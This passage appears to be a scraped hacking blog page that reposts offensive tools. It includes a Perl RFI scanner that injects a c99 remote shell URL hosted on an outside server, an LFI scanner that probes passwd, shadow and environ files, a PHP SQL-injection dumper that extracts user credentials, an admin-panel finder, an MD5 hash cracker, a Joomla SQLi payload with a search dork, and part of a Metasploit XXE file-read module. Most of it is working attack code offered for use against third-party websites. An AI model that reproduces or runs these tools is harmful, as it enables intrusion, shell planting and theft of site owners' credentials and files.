$rfi383="forum/impex/ImpExData.php?systempath=";
$rfi384="forums/impex/ImpExData.php?systempath=";
$rfi385="application.php?base_path=";
$rfi386="index.php?theme_path=";
$rfi387="become_editor.php?theme_path=";
$rfi388="add.php?theme_path=";
$rfi389="bad_link.php?theme_path=";
$rfi390="browse.php?theme_path=";
$rfi391="detail.php?theme_path=";
$rfi392="fav.php?theme_path=";
$rfi393="get_rated.php?theme_path=";
$rfi394="login.php?theme_path=";
$rfi395="mailing_list.php?theme_path=";
$rfi396="new.php?theme_path=";
$rfi397="modify.php?theme_path=";
$rfi398="pick.php?theme_path=";
$rfi399="power_search.php?theme_path=";
$rfi400="rating.php?theme_path=";
$rfi401="register.php?theme_path=";
$rfi402="review.php?theme_path=";
$rfi403="rss.php?theme_path=";
$rfi404="search.php?theme_path=";
$rfi405="send_pwd.php?theme_path=";
$rfi406="sendmail.php?theme_path=";
$rfi407="tell_friend.php?theme_path=";
$rfi408="top_rated.php?theme_path=";
$rfi409="user_detail.php?theme_path=";
$rfi410="user_search.php?theme_path=";
$int = $values[ rand(4) ];
for($int=1;$int<710;$int++){
@cmdgif="http://ctte.php0h.com/c99.txt?";
$lol="rfi";
$asd=$lol.$int;
$url2="http://".$host."/".$$asd."@cmdgif?";
my $req=HTTP::Request->new(GET=>$url2);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);
if ($response->is_success) {
if( $response->content =~ /r00tShell/ && $response->content =~ /TEAM/ ){
open(FILE,">>file.txt");
print FILE "$url2\n";
close(FILE);
print "$url2 is vulnz..\n";
}}
}
}

Viper LFI Scanner Ver. 3.0

Posted by Yas 0 comments

#!/usr/bin/perl
#
#                ////////////////////////////////////
#                    Viper LFI Scanner Ver. 3.0
#                ////////////////////////////////////
#
#    Title : Viper Lfi Scanner Ver. 3.0
#    Author: Bl4ck.Viper
#    From : Azarbycan
#    Date : 2010/08/27
#    Category : Scanner
#    Home : www.Skote-vahshat.com
#    Emails : Bl4ck.Viper@Yahoo.com , Bl4ck.Viper@Hotmail.com , Bl4ck.Viper@Gmail.com
#
#
#    Description :Log , Environ , Passwd File Scanner
#
#
#*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

    use HTTP::Request;
    use LWP::UserAgent;
system ("cls");
print "\t\t/////////////////////////////////////////////////\n";
print "\t\t_________________________________________________\n";
print "\t\t\t Viper LFI Scanner Ver. 3.0\n";
print "\t\t\t Coded By Bl4ck.Viper\n";
print "\t\t\t Made In Azarbycan\n";
print "\t\t\t Version In English\n";
print "\t\t_________________________________________________\n";
print "\n\n";
sleep (1);
print "\t\t\t\t WELCOME\n";
print "\n\n";
menu:;
print "\tMenu:\n";
print "\t ID[1]=>Passwd,Log";
print "\t[Scan Files Of /etc/ Directory]\n";
print "\t ID[2]=>Environ";
print "\t\t[Scan Environ File For Inject Shell By U-Agent]\n";
print"\n";
print "\t\t Select ID For Start Scanner :";
$menu = <>;
if ($menu =~ /1/){
    goto lfi;
    }
    if ($menu =~ /2/){
        goto env;
    }
    else {
        print"\n\n";
        print "\t\tUnknow Command\n";
        goto menu;
    };

lfi:;
    print "\n\n";
    print "\t\t\tWelcome To /etc/ Section\n\n";
    print "\t Insert Target (ex: http://www.site.com/index.php?page=)\n";
    print "\t Target :";
    $host=<STDIN>;
    chomp($host);
    if($host !~ /http:\/\//) { $host = "http://$host"; };

print "\n\n";
print "\t\t*-*-*-*-*-* WORKING IN PROGRESS *-*-*-*-*-*\n";
print "\n\n";
@lfi = ('../etc/passwd',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../../etc/passwd',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../../etc/passwd',
'../etc/shadow',
'../../etc/shadow',
'../../../etc/shadow',
'../../../../etc/shadow',
'../../../../../etc/shadow',
'../../../../../../etc/shadow',
'../../../../../../../etc/shadow',
'../../../../../../../../etc/shadow',
'../../../../../../../../../etc/shadow',
'../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../../etc/shadow',
'../etc/shadow',
'../../etc/shadow',
'../../../etc/shadow',
'../../../../etc/shadow',
'../../../../../etc/shadow',
'../../../../../../etc/shadow',
'../../../../../../../etc/shadow',
'../../../../../../../../etc/shadow',
'../../../../../../../../../etc/shadow',
'../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../../etc/shadow',
'../etc/group',
'../../etc/group',
'../../../etc/group',
'../../../../etc/group',
'../../../../../etc/group',
'../../../../../../etc/group',
'../../../../../../../etc/group',
'../../../../../../../../etc/group',
'../../../../../../../../../etc/group',
'../../../../../../../../../../etc/group',
'../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../../etc/group',
'../etc/group',
'../../etc/group',
'../../../etc/group',
'../../../../etc/group',
'../../../../../etc/group',
'../../../../../../etc/group',
'../../../../../../../etc/group',
'../../../../../../../../etc/group',
'../../../../../../../../../etc/group',
'../../../../../../../../../../etc/group',
'../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../../etc/group',
'../etc/security/group',
'../../etc/security/group',
'../../../etc/security/group',
'../../../../etc/security/group',
'../../../../../etc/security/group',
'../../../../../../etc/security/group',
'../../../../../../../etc/security/group',
'../../../../../../../../etc/security/group',
'../../../../../../../../../etc/security/group',
'../../../../../../../../../../etc/security/group',
'../../../../../../../../../../../etc/security/group',
'../etc/security/group',
'../../etc/security/group',
'../../../etc/security/group',
'../../../../etc/security/group',
'../../../../../etc/security/group',
'../../../../../../etc/security/group',
'../../../../../../../etc/security/group',
'../../../../../../../../etc/security/group',
'../../../../../../../../../etc/security/group',
'../../../../../../../../../../etc/security/group',
'../../../../../../../../../../../etc/security/group',
'../etc/security/passwd',
'../../etc/security/passwd',
'../../../etc/security/passwd',
'../../../../etc/security/passwd',
'../../../../../etc/security/passwd',
'../../../../../../etc/security/passwd',
'../../../../../../../etc/security/passwd',
'../../../../../../../../etc/security/passwd',
'../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../../etc/security/passwd',
'../etc/security/passwd',
'../../etc/security/passwd',
'../../../etc/security/passwd',
'../../../../etc/security/passwd',
'../../../../../etc/security/passwd',
'../../../../../../etc/security/passwd',
'../../../../../../../etc/security/passwd',
'../../../../../../../../etc/security/passwd',
'../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../../etc/security/passwd',
'../etc/security/user',
'../../etc/security/user',
'../../../etc/security/user',
'../../../../etc/security/user',
'../../../../../etc/security/user',
'../../../../../../etc/security/user',
'../../../../../../../etc/security/user',
'../../../../../../../../etc/security/user',
'../../../../../../../../../etc/security/user',
'../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../../etc/security/user',
'../etc/security/user',
'../../etc/security/user',
'../../../etc/security/user',
'../../../../etc/security/user',
'../../../../../etc/security/user',
'../../../../../../etc/security/user',
'../../../../../../../etc/security/user',
'../../../../../../../../etc/security/user',
'../../../../../../../../../etc/security/user',
'../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../../etc/security/user');

foreach $scan(@lfi){

$url = $host.$scan;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();

$response = $useragent->request($request);
if ($response->is_success && $response->content =~ /root:x:/) { $msg = Vulnerability;}
else { $msg = "Not Found";}
print "$scan..........[$msg]\n";
}
env:;
    print "\n\n";
    print "\t\t\tWelcom To Environ Section\n\n";
    print "\t Insert Target (ex: http://www.site.com/index.php?page=)\n";
    print "\t Target :";
    $host=<STDIN>;
    chomp($host);
    if($host !~ /http:\/\//) { $host = "http://$host"; };

print "\n\n";
print "\t\t*-*-*-*-*-* WORKING IN PROGRESS *-*-*-*-*-*\n";
print "\n\n";

@env = ('../proc/self/environ',
'../../proc/self/environ',
'../../../proc/self/environ',
'../../../../proc/self/environ',
'../../../../../proc/self/environ',
'../../../../../../proc/self/environ',
'../../../../../../../proc/self/environ',
'../../../../../../../../proc/self/environ',
'../../../../../../../../../proc/self/environ',
'../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../../../proc/self/environ',
'../proc/self/environ',
'../../proc/self/environ',
'../../../proc/self/environ',
'../../../../proc/self/environ',
'../../../../../proc/self/environ',
'../../../../../../proc/self/environ',
'../../../../../../../proc/self/environ',
'../../../../../../../../proc/self/environ',
'../../../../../../../../../proc/self/environ',
'../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../../../proc/self/environ');

foreach $scan_env(@env){

$url = $host.$scan_env;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();

$response = $useragent->request($request);
if ($response->is_success && $response->content =~ /HTTP_ACCEPT/ && $response->content =~ /HTTP_HOST/) { $msg = Vulnerability;}
else { $msg = "Not Found";}
print "$scan_env..........[$msg]\n";
}

MySQL Injection Dumper GUI

Posted by Yas 0 comments

<?php

#MySQL Injection Dumper GUI
#Coded By Burtay - Ayýn Ðayýn - Þemsul-Hack
#admin@burtay.org
#Burtay.Org
#Megaturks.Net
#Usage Video -> http://vimeo.com/14114247

error_reporting(0);
set_time_limit(0);

class dumper
{
public    $regex        =    '#<burtay>(.*?)</burtay>#si';

            public function get($site)
            {

                $curl            =        curl_init();
                curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
                curl_setopt($curl,CURLOPT_URL,$site);
                $calis            =        curl_exec($curl);
                curl_close($curl);
                return $calis;
            }

            public function dump($site,$kolon_sayisi,$etkilenen_kolon,$username,$password,$tablo)
            {
                $colons        =    'concat(0x3c6275727461793e,'.$username.',0x3a,'.$password.',0x3c2f6275727461793e)';
                $counts        =    'concat(0x3c6275727461793e,count('.$username.'),0x3c2f6275727461793e)';
                $colon        =    null;
                $count        =    null;
                    for($i=1 ; $i<=$kolon_sayisi ; $i++)
                    {
                        if( $kolon_sayisi==1 )
                        {
                            $colon    =    $colons;
                            $count    =    $counts;
                        }
                        elseif( $i == $etkilenen_kolon )
                        {
                            $colon    =    $colon . ','. $colons;
                            $count    =    $count . ','. $counts;
                        }

                        elseif( $colon == null )
                        {
                            $colon    =    $i;
                            $count    =    $i;
                        }
                        else
                        {
                            $colon    =    $colon . ','. $i;
                            $count    =    $count . ','. $i;
                        }
                    }
                    $say    =         $site . "+and+1=0+union+select+".$count."+from+".$tablo."--";
                    echo $say."<br>";
                    $kaynak    =        $this->get($say);
                    preg_match($this->regex,$kaynak,$toplam);
                    $this->kaydet($site,$toplam[1]);
                    ob_flush();
                    flush();
                    echo "Toplam <b>". $toplam[1] ."</b> Adet User List Çekilecek<br><br>";
                    for($k=0; $k<=$toplam[1] ; $k++)
                    {
                        $sites        =    $site . '+and+1=0+union+select+'.$colon.'+from+'.$tablo.'+limit+'.$k.',1--';
                        $kaynak        =    $this->get($sites);
                        preg_match($this->regex,$kaynak,$list);
                        ob_flush();
                        flush();
                        echo $list[1]."<br>";
                        $this->kaydet($site,$list[1]);
                    }
                    echo "<b>Tarama Bitti</b>";
            }

            public    function kaydet($url,$data)
            {
                $site        =        parse_url($url);
                $site        =        $site["host"];
                $ac            =        fopen($site.'.txt','ab');
                                    fwrite($ac,$data."\n");
                                    fclose($ac);
            }
}
$class    =    new dumper();
echo
        '
            <Center>
            <b>MySQL Injection Dumper<br>
            Coded By Burtay</b><br>
            <a href="http://burtay.org">Burtay.Org</a></b><br><br>
            <form action="" method="post">
            <b>Site<br>
            <input type="text" name="site" style="width:400"><br>
            Kolon Sayisi<br>
            <input type="text" name="max_kolon" style="width:50"><br>
            Etkilenen Kolon<br>
            <input type="text" name="effected" style="width:50"><br>
            Username Kolon Ýsmi<br>
            <input type="text" name="username" style="width:150"><br>
            Password Kolon ismi<br>
            <input type="text" name="password" style="width:150"><br>
            Tablo ismi</b><br>
            <input type="text" name="tablo" style="width:150"><br>
            <input type="submit" value="Dump!">
            </Center>
        ';
if ($_POST["site"] !=="" and $_POST["max_kolon"] !="" and $_POST["tablo"] !="")
{
$site            =        $_POST["site"];
$max_kolon        =        $_POST["max_kolon"];
$effected        =        $_POST["effected"];
$username        =        $_POST["username"];
$password        =        $_POST["password"];
$tablo            =        $_POST["tablo"];
$class->dump($site,$max_kolon,$effected,$username,$password,$tablo);
}
?>

PHP Admin Finder

Posted by Yas 0 comments

<html>
<title>Php My Admin Finder Code by skote_vahshat version 2</title>
<body>
<form action ="finder.php" method="post">
URL to site: <input type ="text" name="site"/>
<input type = "submit" value="Find" />
</form>
</body>
</html>
//TbH Team
// Turk Black Hat
// skote_vahshat Admin page Scaner
<?php
$site = $_POST['site'];

$list = array(
'/admin/',
'/login/',
'/admin1.php/',
'/admin.php/',
'/admin.html/',
'/admin1.php/',
'/admin1.html/',
'/login.php/',
'/admin/cp.php/',
'/cp.php/',
'/administrator/index.php/',
'/administrator/index.html/',
'/administartor/',
'/admin.login/',
'/administrator/login.php/',
'/administrator/login.html/',
'/phpMyAdmin/',
'/phpmyadmin/',
'/PMA/',
'/pma/',
'/dbadmin/',
'/mysql/',
'/myadmin/',
'/phpmyadmin2/',
'/phpMyAdmin2/',
'/phpMyAdmin-2/',
'/php-my-admin/',
'/phpMyAdmin-2.2.3/',
'/phpMyAdmin-2.2.6/',
'/phpMyAdmin-2.5.1/',
'/phpMyAdmin-2.5.4/',
'/phpMyAdmin-2.5.5-rc1/',
'/phpMyAdmin-2.5.5-rc2/',
'/phpMyAdmin-2.5.5/',
'/phpMyAdmin-2.5.5-pl1/',
'/phpMyAdmin-2.5.6-rc1/',
'/phpMyAdmin-2.5.6-rc2/',
'/phpMyAdmin-2.5.6/',
'/phpMyAdmin-2.5.7/',
'/phpMyAdmin-2.5.7-pl1/',
'/phpMyAdmin-2.6.0-alpha/',
'/phpMyAdmin-2.6.0-alpha2/',
'/phpMyAdmin-2.6.0-beta1/',
'/phpMyAdmin-2.6.0-beta2/',
'/phpMyAdmin-2.6.0-rc1/',
'/phpMyAdmin-2.6.0-rc2/',
'/phpMyAdmin-2.6.0-rc3/',
'/phpMyAdmin-2.6.0/',
'/phpMyAdmin-2.6.0-pl1/',
'/phpMyAdmin-2.6.0-pl2/',
'/phpMyAdmin-2.6.0-pl3/',
'/phpMyAdmin-2.6.1-rc1/',
'/phpMyAdmin-2.6.1-rc2/',
'/phpMyAdmin-2.6.1/',
'/phpMyAdmin-2.6.1-pl1/',
'/phpMyAdmin-2.6.1-pl2/',
'/phpMyAdmin-2.6.1-pl3/',
'/phpMyAdmin-2.6.2-rc1/',
'/phpMyAdmin-2.6.2-beta1/',
'/phpMyAdmin-2.6.2-rc1/',
'/phpMyAdmin-2.6.2/',
'/phpMyAdmin-2.6.2-pl1/',
'/phpMyAdmin-2.6.3/',
'/phpMyAdmin-2.6.3-rc1/',
'/phpMyAdmin-2.6.3/',
'/phpMyAdmin-2.6.3-pl1/',
'/phpMyAdmin-2.6.4-rc1/',
'/phpMyAdmin-2.6.4-pl1/',
'/phpMyAdmin-2.6.4-pl2/',
'/phpMyAdmin-2.6.4-pl3/',
'/phpMyAdmin-2.6.4-pl4/',
'/phpMyAdmin-2.6.4/',
'/phpMyAdmin-2.7.0-beta1/',
'/phpMyAdmin-2.7.0-rc1/',
'/phpMyAdmin-2.7.0-pl1/',
'/phpMyAdmin-2.7.0-pl2/',
'/phpMyAdmin-2.7.0/',
'/phpMyAdmin-2.8.0-beta1/',
'/phpMyAdmin-2.8.0-rc1/',
'/phpMyAdmin-2.8.0-rc2/',
'/phpMyAdmin-2.8.0/',
'/phpMyAdmin-2.8.0.1/',
'/phpMyAdmin-2.8.0.2/',
'/phpMyAdmin-2.8.0.3/',
'/phpMyAdmin-2.8.0.4/',
'/phpMyAdmin-2.8.1-rc1/',
'/phpMyAdmin-2.8.1/',
'/phpMyAdmin-2.8.2/',
'/sqlmanager/',
'/mysqlmanager/',
'/p/m/a/',
'/PMA2005/',
'/pma2005/',
'/phpmanager/',
'/php-myadmin/',
'/phpmy-admin/',
'/webadmin/',
'/sqlweb/',
'/websql/',
'/webdb/',
'/mysqladmin/',
'/mysql-admin/',
'/mya/',
);

if(isset($site)){

foreach($list as $path => $test) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $site.$test);
$result = curl_exec($ch);
curl_close($ch);
//print $url;
if (preg_match("/200 OK/", $result)){
echo "<br /> [!] w00t! w00t! Found phpMyAdmin [ $site$test ]";
}
else if (preg_match("/401 Unauthorized/", $result)) {
echo "<br /> [!] w00t! w00t! Found phpMyAdmin [ $site$test ]";
}
else {
echo "<br /> [-] Nothing found on [$site$test]";
}
}
}

?>

MD5 MySQL Brute Forcer

Posted by Yas 0 comments

#!/usr/bin/env python
################################################################
#       .___            __        _______       .___        #
#    __| _/____ _______| | __ ____ \   _ \    __| _/____    #
#    / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \   #
#   / /_/ | / __ \| | \/    <\ \___\ \_/   \/ /_/ \ ___/   #
#   \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\   #
#        \/                \/            \/                #
#                   ___________   ______ _ __                #
#                _/ ___\_ __ \_/ __ \ \/ \/ /                #
#                \ \___| | \/\ ___/\    /                #
#                \___ >__|    \___ >\/\_/                #
#    est.2007        \/            \/   forum.darkc0de.com   #
################################################################
#
# md5 MySQL Database BruteForce AllinOne python v 1.1
# python by low1z feb2009
# idea & php design froz3n @ darkc0de
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#    GNU General Public License for more details
#
#    You should have received a copy of the GNU General Public License
#    along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# darkc0de Crew
# www.darkc0de.com
# code low1z
#
# Greetz to
# d3hydr8, rsauron, baltazar, inkubus, kopele
# and the rest of the Darkc0de members
#
import MySQLdb, sys, re, md5, time
host    = 'YOUR-MYSQLSERVER-IP-HERE'
username = 'YOUR-MYSQLUSERNAME-HERE'
password = 'YOUR-MYSQLPASSWD-HERE'
dbname   = 'md5db'
onloadDBstatus = 0
version = '1.1_feb09'
db = MySQLdb.connect(host=host, user=username, passwd=password)
def dbconnect():
    csr = db.cursor()
    return(csr)
def timer():
    now = time.localtime(time.time())
    return time.asctime(now)
def setupdb():
    csr = dbconnect()
    try:
        csr.execute("CREATE DATABASE "+dbname)
        print "Database:", dbname, "created"
    except MySQLdb.Error, e:
        print "Error %s" % (e.args[1])
        sys.exit(1)
    try:
        csr.execute("CREATE TABLE "+dbname+".data (id INT( 255 ) NOT NULL AUTO_INCREMENT ,plain TEXT NOT NULL ,md5 VARCHAR( 255 ) NOT NULL ,PRIMARY KEY ( id ) , UNIQUE ( md5 )) ENGINE = MYISAM;")
        print "Tables in db:", dbname, "created, Database ready to use!"
    except MySQLdb.Error, e:
        print "Error %s" % (e.args[1])
        sys.exit(1)
def insertwl():
    counter = 0
    try:
        words = open(wordlist, "r")
    except(IOError):
        print "Error: check", wordlist
        sys.exit(1)
    dupes = 0
    print "Inserting Wordlist, Skipping Dupes....may take ages"
    print "\nStart :", timer()
    for word in words.read().split('\n'):
        hash = md5.new(word).hexdigest()
        counter = counter+1
        try:
            csr = dbconnect()
            csr.execute("INSERT INTO "+dbname+".data (plain, md5)VALUES ('"+str(word)+"', '"+str(hash)+"');")
        except MySQLdb.Error, e:
            dupes = dupes+1
    print "\nDupes :", dupes
    print "\nDone :", timer()
def statusdb():
    try:
        csr = dbconnect()
        csr.execute("SELECT COUNT(id) AS num FROM "+dbname+".data")
        dbcount = csr.fetchone()
        return dbcount[0]
        csr.close()
    except MySQLdb.Error, e:
        print "Error %s" % (e.args[1])
        sys.exit(1)
def dropdb():
    csr = dbconnect()
    try:
        csr.execute("DROP DATABASE "+dbname)
        print "Database:", dbname, "deleted"
    except MySQLdb.Error, e:
        print "Error %s" % (e.args[1])
        sys.exit(1)
def single(sshash):
    csr = dbconnect ()
    csr.execute("SELECT plain FROM "+dbname+".data WHERE md5 = '"+sshash+"'")
    dset = csr.fetchone()
    if dset == None:
        print sshash, " : ", "not in DB"
    else:
        print sshash, " : ", dset[0]
    csr.close()
def multi():
    try:
        sshashs = open(md5file, "r").readlines()
        for sshash in sshashs:
            sshash = sshash.replace("\n","")
            single(sshash)
    except(IOError):
        print "Check your Filepath!!\n"
def helpme():
    print "HELP - Args\n"
    print " -h / -help    |   bring up this screen"
    print " -s / -setupdb   |   initial db installation"
    print " -w / -wordlist |   insert wordlist into db eg. -w <wordlist.txt>"
    print " -d / -dropdb    |   delete database"
    print " -ss / -single   |   search db for given hash eg. >python md5db.py -ss <hash>"
    print " -ms / - multi   |   takes a list of md5's for cracking eg. >python md5db -ms <hashfile>"
    print " -c / -count    |   count database entries\n"
print "                _ ___    _ _    "
print "        _ __ __| | __| __| | |__ "
print "       | ' \/ _` |__ \/ _` | '_ \ "
print "       |_|_|_\__,_|___/\__,_|_.__/ "
print "+--------------------------------------+"
print "| + Python/MySQL Bruteforce AllinOne + |"
print "|                        |"
print "| + md5db11.py", version, "            |"
print "| + php & concept by froz3n            |"
print "| + python by low1z                    |"
print "|                        |"
print "| + use -h for help               |"
print "+--------------------------------------+\n"
if onloadDBstatus == 1:
    try:
        print "\t",statusdb(), " Sets in DB\n"
    except MySQLdb.Error, e:
        print "Error, Database is not in place, use -s option to create it"
if len(sys.argv) <= 1:
    print "\tuse -help to get options\n"
    sys.exit(1)
for arg in sys.argv[1:]:
    if arg.lower() == "-h" or arg.lower() == "-help":
        helpme()
    if arg.lower() == "-s" or arg.lower() == "-setupdb":
        setupdb()
    if arg.lower() == "-d" or arg.lower() == "-dropdb":
        dropdb()
    if arg.lower() == "-c" or arg.lower() == "-count":
        print "\t",statusdb(), " Sets in DB\n"
    if arg.lower() == "-ss" or arg.lower() == "single":
        try:
            sshash = sys.argv[2]
            if len(sshash) != 32:
                print "invalid md5 supplied, check your input!\n"
                sys.exit(1)
            single(sshash)
        except(IndexError):
            print "Error: check hash ...\n"
    if arg.lower() == "-w" or arg.lower() == "-wordlist":
        try:
            wordlist = sys.argv[2]
            insertwl()
        except(IndexError):
            print "Error: check wordlist file\n"
    if arg.lower() == "-ms" or arg.lower() == "-multi":
        try:
            md5file = sys.argv[2]
            multi()
        except(IndexError):
            print "Error: check md5 plain import file...\n"

Joomla Component (com_dshop) SQL Injection Vulnerability

Posted by Yas 0 comments

################################################################################################
#  Exploit Title: Joomla Component (com_dshop) SQL Injection Vulnerability
#
#  Google Dork : inurl:com_dshop
#
#  Status : High-Risk
#
#  Script Page : null
#
#  Reference : http://www.securityfocus.com/bid/47971/info
################################################################################################
#
#  SQL Vulnerability
#
#  http://127.0.0.1/[PATH]/index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12 (SQL)
#
#  SQL Exploit
#
#     +union+select+0,1,2,group_concat(username,0x3a,password),4,5,6,7+from+jos_users
#
################################################################################################

phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection

Posted by Yas 0 comments

# Exploit Title: poc-phpmyadmin-local-file-inclusion-via-xxe-injection
# Date: 12-01-2012
# Author: Marco Batista
# Blog Link: http://www.secforce.com/blog/2012/01/cve-2011-4107-poc-phpmyadmin-local-file-inclusion-via-xxe-injection/
# Tested on: Windows and Linux - phpmyadmin versions: 3.3.6, 3.3.10, 3.4.0, 3.4.5, 3.4.7
# CVE : CVE-2011-4107

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

    include Msf::Exploit::Remote::HttpClient

    def initialize
        super(
            'Name'        => 'phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection',
            'Version'     => '1.0',
            'Description' => %q{Importing a specially-crafted XML file which contains an XML entity injection permits to retrieve a local file (limited by the privileges of the user running the web server).
            The attacker must be logged in to MySQL via phpMyAdmin.
            Works on Windows and Linux Versions 3.3.X and 3.4.X},
            'References' =>
                [
                    [ 'CVE', '2011-4107' ],
                                        [ 'OSVDB', '76798' ],
                                        [ 'BID', '50497' ],
                                        [ 'URL', 'http://secforce.com/research/'],
                ],
            'Author'      => [ 'Marco Batista' ],
            'License'     => MSF_LICENSE
            )

        register_options(
            [
                Opt::RPORT(80),
                OptString.new('FILE', [ true, "File to read", '/etc/passwd']),
                OptString.new('USER', [ true, "Username", 'root']),
                OptString.new('PASS', [ false, "Password", 'password']),
                OptString.new('DB', [ true, "Database to use/create", 'hddaccess']),
                OptString.new('TBL', [ true, "Table to use/create and read the file to", 'files']),
                OptString.new('APP', [ true, "Location for phpMyAdmin URL", '/phpmyadmin']),
                OptString.new('DROP', [ true, "Drop database after reading file?", 'true']),
            ],self.class)
    end

    def loginprocess
        # HTTP GET TO GET SESSION VALUES
        getresponse = send_request_cgi({
            'uri'     => datastore['APP']+'/index.php',
            'method' => 'GET',
            'version' => '1.1',
            }, 25)

        if (getresponse.nil?)
            print_error("no response for #{ip}:#{rport}")
        elsif (getresponse.code == 200)
            print_status("Received #{getresponse.code} from #{rhost}:#{rport}")
        elsif (getresponse and getresponse.code == 302 or getresponse.code == 301)
            print_status("Received 302 to #{getresponse.headers['Location']}")
        else
            print_error("Received #{getresponse.code} from #{rhost}:#{rport}")
        end

        valuesget = getresponse.headers["Set-Cookie"]
        varsget = valuesget.split(" ")

        #GETTING THE VARIABLES NEEDED
        phpMyAdmin = varsget.grep(/phpMyAdmin/).last
        pma_mcrypt_iv = varsget.grep(/pma_mcrypt_iv/).last
        # END HTTP GET

        # LOGIN POST REQUEST TO GET COOKIE VALUE
        postresponse = send_request_cgi({
            'uri'     => datastore['APP']+'/index.php',
            'method' => 'POST',
            'version' => '1.1',
            'headers' =>{
                    'Content-Type' => 'application/x-www-form-urlencoded',
                    'Cookie' => "#{pma_mcrypt_iv} #{phpMyAdmin}"
                            },
            'data'    => 'pma_username='+datastore['USER']+'&pma_password='+datastore['PASS']+'&server=1'
            }, 25)

        if (postresponse["Location"].nil?)
            print_status("TESTING#{postresponse.body.split("'").grep(/token/).first.split("=").last}")
            tokenvalue = postresponse.body.split("'").grep(/token/).first.split("=").last
        else
            tokenvalue = postresponse["Location"].split("&").grep(/token/).last.split("=").last
        end


        valuespost = postresponse.headers["Set-Cookie"]
        varspost = valuespost.split(" ")

        #GETTING THE VARIABLES NEEDED
        pmaUser = varspost.grep(/pmaUser-1/).last
        pmaPass = varspost.grep(/pmaPass-1/).last

        return "#{pma_mcrypt_iv} #{phpMyAdmin} #{pmaUser} #{pmaPass}",tokenvalue
        # END OF LOGIN POST REQUEST
        rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, Rex::ConnectionError =>e
            print_error(e.message)
        rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =>e
            print_error(e.message)
    end

    def readfile(cookie,tokenvalue)
        #READFILE TROUGH EXPORT FUNCTION IN PHPMYADMIN
        getfiles = send_request_cgi({
            'uri'     => datastore['APP']+'/export.php',
            'method' => 'POST',
            'version' => '1.1',
            'headers' =>{
                    'Cookie' => cookie
                        },
            'data'    => 'db='+datastore['DB']+'&table='+datastore['TBL']+'&token='+tokenvalue+'&single_table=TRUE&export_type=table&sql_query=SELECT+*+FROM+%60files%60&what=texytext&texytext_structure=something&texytext_data=something&texytext_null=NULL&asfile=sendit&allrows=1&codegen_structure_or_data=data&texytext_structure_or_data=structure_and_data&yaml_structure_or_data=data'
            }, 25)

